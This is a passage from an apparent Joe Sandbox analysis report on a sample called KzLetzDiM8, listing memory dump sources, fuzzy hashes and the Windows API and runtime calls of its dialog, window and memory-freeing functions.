                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                            • Instruction ID: d07d05e482410d37b4ad6843a6723634b3122e71db89a4ecaa8893917d15f793
                                                            • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                            • Instruction Fuzzy Hash: 5C62FB7160C7498FCB19CF28C8909B9BBE1BFD5304F18896DE99A8B386D730E945CB15
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                            • Instruction ID: c4d3738c50e86854c83315da9e6f0f6ea26258b4a1f734668e3d5a3dd106c195
                                                            • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                            • Instruction Fuzzy Hash: A0524B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce92df74228eae306f6282da784ef4391deda09fde9c8428e1703ec3bbb57a81
                                                            • Instruction ID: 5a9ffdd15a7ee458b3404037a2a22be0336c63483827300faccee4912f943279
                                                            • Opcode Fuzzy Hash: ce92df74228eae306f6282da784ef4391deda09fde9c8428e1703ec3bbb57a81
                                                            • Instruction Fuzzy Hash: 3812C2B161870A9FC718CF28C890AB9B7E1FF94304F14492EEA96C7781E374E995CB45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f93ed20eb52f331a6b6902d4d077303fee7c4fa3d64ab80b83097ccdd4126d91
                                                            • Instruction ID: d0db1d5c99c7b76d38822298212a4f2d78d4a10810d098d94ed4582cf2b704ac
                                                            • Opcode Fuzzy Hash: f93ed20eb52f331a6b6902d4d077303fee7c4fa3d64ab80b83097ccdd4126d91
                                                            • Instruction Fuzzy Hash: 71F1AD71A087818FC718CF2AC99466EBBE5EFC9318F154A2EF48597352D730D946CB82
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7b38cfba5593a9cb237a29968060520bc16cbca4c12838bb6584da044305a10
                                                            • Instruction ID: 6d4291e9978e2dc988ec08dc35e10f4cb59ca582acf4c56d96505d249b5ec3a2
                                                            • Opcode Fuzzy Hash: b7b38cfba5593a9cb237a29968060520bc16cbca4c12838bb6584da044305a10
                                                            • Instruction Fuzzy Hash: 5BE16A755083949FC314CF69E88486ABFF1AF8A300F45495EF9C497352C334EA1ADBA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                            • Instruction ID: 29073611cf4138c1a82e83785ed4c00f89f981ca911ecb072dde25d435331e07
                                                            • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                            • Instruction Fuzzy Hash: 549146B020478D8BDB28EE64E891BBF77D5EFA0304F54092DF796C7282DB64A585C352
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction ID: 38329f3a50fba427ceaa6b152ff37fd0ea3fe0faf4c69c325cee1eb0185cec9e
                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction Fuzzy Hash: 2081327170434E4BDB24EE68D8D1B7F77D4AFA1304F44092DE786CB182DB7499858751
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 018388020cf0fa458fb53ca2db5843eefe05bbfd86081043f98e4eb1a6036031
                                                            • Instruction ID: 3f9c99a653d3baa2bce75b1b0421484c72812632310559800f0736a93dc7cbe8
                                                            • Opcode Fuzzy Hash: 018388020cf0fa458fb53ca2db5843eefe05bbfd86081043f98e4eb1a6036031
                                                            • Instruction Fuzzy Hash: 14615631630F3A6BDF389E6858957BF2394EF42340F140959EC42DB2C3D6959D628E15
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                            • Instruction ID: 03a9455af226de500b19871651afc532e8daeb265fad541d1679ebdff9963160
                                                            • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                            • Instruction Fuzzy Hash: D45156B0230F2757DF346D28845ABBF67C69B09300F184819E98AC76C3C645ED358FA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4e67d6ed795a69a0d36d6d5c46ba48964088f0e31bebfa9e735ff2200f64647
                                                            • Instruction ID: d1f20e068c794c0b3fa73e32e00e070c309c434dbd6230fdcf69ba476e09f6d9
                                                            • Opcode Fuzzy Hash: b4e67d6ed795a69a0d36d6d5c46ba48964088f0e31bebfa9e735ff2200f64647
                                                            • Instruction Fuzzy Hash: 9C51B4315097D58FD712CF25C5404AEBFE1AEAA314F4A09ADE8D95B243C321DB4BCB62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d78e74cfd922bc9a009d39d8af33cbb09e9f8de217b0ca2fe835ae1b53db6656
                                                            • Instruction ID: a2d640f629f0a525b078767508107301a1b8a4c9f235e78643ae33f5ad418ba0
                                                            • Opcode Fuzzy Hash: d78e74cfd922bc9a009d39d8af33cbb09e9f8de217b0ca2fe835ae1b53db6656
                                                            • Instruction Fuzzy Hash: C451DFB1A087159FC748CF19D48055AF7E1FB88314F058A2EE899E3341DB34EA59CB96
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction ID: 21e015dcfa55f95602b846101b6e4a5c48265e2ac73ab8b5819b17f7d237990c
                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction Fuzzy Hash: 723107B1A1474A8FCB18DF28C85116EBBE0FF95304F54452DE599C7342C734EA0ACB92
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 001EE30E
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                              • Part of subcall function 001F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00221030,?,001ED928,00000000,?,00000050,00221030), ref: 001F1DC4
                                                            • _strlen.LIBCMT ref: 001EE32F
                                                            • SetDlgItemTextW.USER32(?,0021E274,?), ref: 001EE38F
                                                            • GetWindowRect.USER32(?,?), ref: 001EE3C9
                                                            • GetClientRect.USER32(?,?), ref: 001EE3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 001EE475
                                                            • GetWindowRect.USER32(?,?), ref: 001EE4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 001EE4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 001EE4E3
                                                            • GetWindow.USER32(?,00000005), ref: 001EE4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 001EE51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 001EE58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d$t!
                                                            • API String ID: 2407758923-2187398833
                                                            • Opcode ID: 7eca36074aad9ffd0b6a48219050aa298dd482f0fe9d991d8fd8f381be1cbb7f
                                                            • Instruction ID: 27fe362bcdba5aea6235d3cfa9a9687eb2ea83ba6f5fa00cca063b57f8e4ae93
                                                            • Opcode Fuzzy Hash: 7eca36074aad9ffd0b6a48219050aa298dd482f0fe9d991d8fd8f381be1cbb7f
                                                            • Instruction Fuzzy Hash: B281AE72208341AFD710DFA9DC89A6FBBE9EF89704F04091DFA88D7291D771E9058B52
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0020CB66
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C71E
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C730
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C742
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C754
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C766
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C778
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C78A
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C79C
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7AE
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7C0
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7D2
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7E4
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7F6
                                                            • _free.LIBCMT ref: 0020CB5B
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 0020CB7D
                                                            • _free.LIBCMT ref: 0020CB92
                                                            • _free.LIBCMT ref: 0020CB9D
                                                            • _free.LIBCMT ref: 0020CBBF
                                                            • _free.LIBCMT ref: 0020CBD2
                                                            • _free.LIBCMT ref: 0020CBE0
                                                            • _free.LIBCMT ref: 0020CBEB
                                                            • _free.LIBCMT ref: 0020CC23
                                                            • _free.LIBCMT ref: 0020CC2A
                                                            • _free.LIBCMT ref: 0020CC47
                                                            • _free.LIBCMT ref: 0020CC5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID: h!
                                                            • API String ID: 161543041-847045497
                                                            • Opcode ID: 95eeb8ffd009641458cde6bfeb7b85782285a5bd2da7b8e436abb3e32830c34d
                                                            • Instruction ID: 6f985100d1cdce3bfca52ca5c003445c5bcf39e60b43098886f6633ba8516d62
                                                            • Opcode Fuzzy Hash: 95eeb8ffd009641458cde6bfeb7b85782285a5bd2da7b8e436abb3e32830c34d
                                                            • Instruction Fuzzy Hash: 12314EB16203079FEB21AF78D846B5BB7E9AF10314F24461AE589D61D3DE71ACA0CB10
                                                            APIs
                                                            • _free.LIBCMT ref: 00209705
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 00209711
                                                            • _free.LIBCMT ref: 0020971C
                                                            • _free.LIBCMT ref: 00209727
                                                            • _free.LIBCMT ref: 00209732
                                                            • _free.LIBCMT ref: 0020973D
                                                            • _free.LIBCMT ref: 00209748
                                                            • _free.LIBCMT ref: 00209753
                                                            • _free.LIBCMT ref: 0020975E
                                                            • _free.LIBCMT ref: 0020976C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID: 0d!
                                                            • API String ID: 776569668-2530378367
                                                            • Opcode ID: c45a1f1430f5bc3120ecc7b5b782c182e4e95754d63aca7321a845532b807d8c
                                                            • Instruction ID: 395731ee849a1dd41188ae7a7898386e12100646cc802792aae9c15b2203b5c9
                                                            • Opcode Fuzzy Hash: c45a1f1430f5bc3120ecc7b5b782c182e4e95754d63aca7321a845532b807d8c
                                                            • Instruction Fuzzy Hash: B011A77612020AAFCB01EF64C842DDE3BB5EF14350B5155A1FB484F1A3DE31DA609F84
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 001F9736
                                                            • _wcslen.LIBCMT ref: 001F97D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 001F97E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 001F9806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001F982D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-4209811716
                                                            • Opcode ID: 91cdb14dc07087bf6aabc466b96e3dae95f55792457386a4829a7f5741574f68
                                                            • Instruction ID: 5fca4112d670ac0602482844eed182282ad132e3a31149350beeedf872ac93a2
                                                            • Opcode Fuzzy Hash: 91cdb14dc07087bf6aabc466b96e3dae95f55792457386a4829a7f5741574f68
                                                            • Instruction Fuzzy Hash: 43316A325183097BD725BF30DC06FBB779CEFA2360F14021EF601961D2EB649A548BA5
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 001FD6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 001FD6ED
                                                              • Part of subcall function 001F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001EC116,00000000,.exe,?,?,00000800,?,?,?,001F8E3C), ref: 001F1FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 001FD709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 001FD720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 001FD734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 001FD75D
                                                            • DeleteObject.GDI32(00000000), ref: 001FD764
                                                            • GetWindow.USER32(00000000,00000002), ref: 001FD76D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
